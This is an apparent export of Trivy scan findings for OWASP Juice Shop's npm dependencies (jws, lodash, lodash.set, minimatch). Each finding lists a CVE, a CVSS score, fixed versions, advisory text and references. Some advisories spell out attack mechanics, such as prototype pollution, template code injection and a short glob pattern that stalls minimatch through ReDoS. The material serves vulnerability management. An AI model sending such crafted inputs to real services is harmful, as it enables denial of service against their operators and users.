This issue has been patched in versions 3.2.3 and 4.0.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jws/package.json,,True,,False,False,,False,,390c1f141543818f055de41579ca3e9ca67f46d6758971397ca47800e56f2997,116,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.149963+00:00,,,,,0,[],"3.2.3, 4.0.1",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-65945 NEWLINE https://github.com/auth0/node-jws NEWLINE https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e NEWLINE https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6 NEWLINE https://github.com/auth0/node-jws/releases/tag/v3.2.3 NEWLINE https://github.com/auth0/node-jws/releases/tag/v4.0.1 NEWLINE https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-65945 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-65945,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-65945 JWS 0.2.6,False,False,,2026-05-12 17:37:05.149915+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-65945,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.159037+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L,5.6,,,400,2026-05-12,,,"lodash: Prototype pollution in utilities function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.17.11 NEWLINE NEWLINE A prototype pollution vulnerability was found in lodash <4.17.11 where the functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of Object.prototype. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,d4ca616e5a76d86323a9717bd409f6958597382f0e359f05ef08180dcb24304c,118,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.159133+00:00,,,,,0,[],>=4.17.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2018-16487 NEWLINE https://github.com/advisories/GHSA-4xc9-xhrj-v574 NEWLINE https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml NEWLINE https://hackerone.com/reports/380873 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2018-16487 NEWLINE https://security.netapp.com/advisory/ntap-20190919-0004 NEWLINE https://security.netapp.com/advisory/ntap-20190919-0004/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2018-16487 NEWLINE https://www.npmjs.com/advisories/782,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2018-16487 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.159050+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2018-16487,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.163192+00:00,CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H,7.2,,,94,2026-05-12,,,nodejs-lodash: command injection via template NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.17.21 NEWLINE NEWLINE Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. 
NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,2f7e06877557882e061c552cd017dcac8902895673a25d0b0d19beae50eae487,119,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.163249+00:00,,,,,0,[],4.17.21,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2021-23337 NEWLINE https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf NEWLINE https://github.com/advisories/GHSA-35jh-r3h4-6jhm NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851 NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851 NEWLINE https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2021-23337 NEWLINE https://security.netapp.com/advisory/ntap-20210312-0006 NEWLINE https://security.netapp.com/advisory/ntap-20210312-0006/ NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929 NEWLINE https://snyk.io/vuln/SNYK-JS-LODASH-1040724 NEWLINE https://www.cve.org/CVERecord?id=CVE-2021-23337 NEWLINE https://www.oracle.com//security-alerts/cpujul2021.html NEWLINE https://www.oracle.com/security-alerts/cpujan2022.html NEWLINE https://www.oracle.com/security-alerts/cpujul2022.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2021.html,Admin User 
(admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2021-23337 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.163201+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2021-23337,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,4.17.21,2026-05-12 17:37:05.174988+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"lodash: lodash: Arbitrary code execution via untrusted input in template imports NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.18.0 NEWLINE NEWLINE Impact: NEWLINE NEWLINE The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. NEWLINE NEWLINE When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time. NEWLINE NEWLINE Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function(). NEWLINE NEWLINE Patches: NEWLINE NEWLINE Users should upgrade to version 4.18.0. NEWLINE NEWLINE Workarounds: NEWLINE NEWLINE Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/lodash/package.json,,True,,False,False,,False,,bd382cfe09c1c6f7eac08c351be1f88a172603a68ffe3cd135b2944910a803f4,122,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.175047+00:00,,,,,0,[],4.18.0,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:10710 NEWLINE https://access.redhat.com/security/cve/CVE-2026-4800 NEWLINE https://bugzilla.redhat.com/2453496 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://errata.almalinux.org/9/ALSA-2026-10710.html NEWLINE https://github.com/advisories/GHSA-35jh-r3h4-6jhm NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c NEWLINE https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc NEWLINE https://linux.oracle.com/cve/CVE-2026-4800.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-10713.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4800 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4800,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-4800 Lodash 4.17.21,False,False,,2026-05-12 17:37:05.174997+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4800,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash.set,4.3.2,2026-05-12 17:37:05.186199+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H,7.4,,,770,2026-05-12,,,nodejs-lodash: prototype pollution in zipObjectDeep function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20. 
NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/lodash.set/package.json,,False,,False,False,,False,,47ba2c057b6551e0249106994f29d726e04e719214372be4bc031977bf87f882,125,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.186252+00:00,,,,,0,[],,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2020-8203 NEWLINE https://github.com/advisories/GHSA-p6mc-m468-83gw NEWLINE https://github.com/github/advisory-database/pull/2884 NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12 NEWLINE https://github.com/lodash/lodash/issues/4744 NEWLINE https://github.com/lodash/lodash/issues/4874 NEWLINE https://github.com/lodash/lodash/wiki/Changelog#v41719 NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml NEWLINE https://hackerone.com/reports/712065 NEWLINE https://hackerone.com/reports/864701 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2020-8203 NEWLINE https://security.netapp.com/advisory/ntap-20200724-0006 NEWLINE https://security.netapp.com/advisory/ntap-20200724-0006/ NEWLINE https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744 NEWLINE https://www.cve.org/CVERecord?id=CVE-2020-8203 NEWLINE https://www.npmjs.com/advisories/1523 NEWLINE https://www.oracle.com//security-alerts/cpujul2021.html NEWLINE https://www.oracle.com/security-alerts/cpuApr2021.html NEWLINE https://www.oracle.com/security-alerts/cpuapr2022.html NEWLINE https://www.oracle.com/security-alerts/cpujan2022.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2021.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2020-8203 lodash.set 4.3.2,False,False,,2026-05-12 17:37:05.186207+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2020-8203,lang-pkgs; node-pkg,"Active, Verified", 
+,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.201854+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,0f24ef80e86ea8b63827c6a6957e24e9d2ff668bc9f10ec80cea27d6f0c0c470,129,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.201907+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.201861+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.206241+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,5cef45a8be9893547d272e4cf8535b17e8bc62abe030b8c9576cff86ec727ed2,130,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.206302+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.206250+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.210047+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. 
This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,767d1deba3cdd58a510c9cf065fce0c693c83f58b6d240d00eedf6981348cfcc,131,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.210100+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE 
https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.210055+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.214213+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,412b14ac32e3eb029cf60d5747ee5867f8f5457381144c1179fe8ebd96344297,132,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.214269+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.214222+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.217872+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,e91de90f77c0bc293f174b50de544e9511f5dc5a1595ae65daabddcb39511991,133,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.217924+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.217879+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.222216+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. 
This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,df6ca419c049033555ed15051dfb3d7b58d94de4cf65f957c57f19ef222f278e,134,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.222275+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE 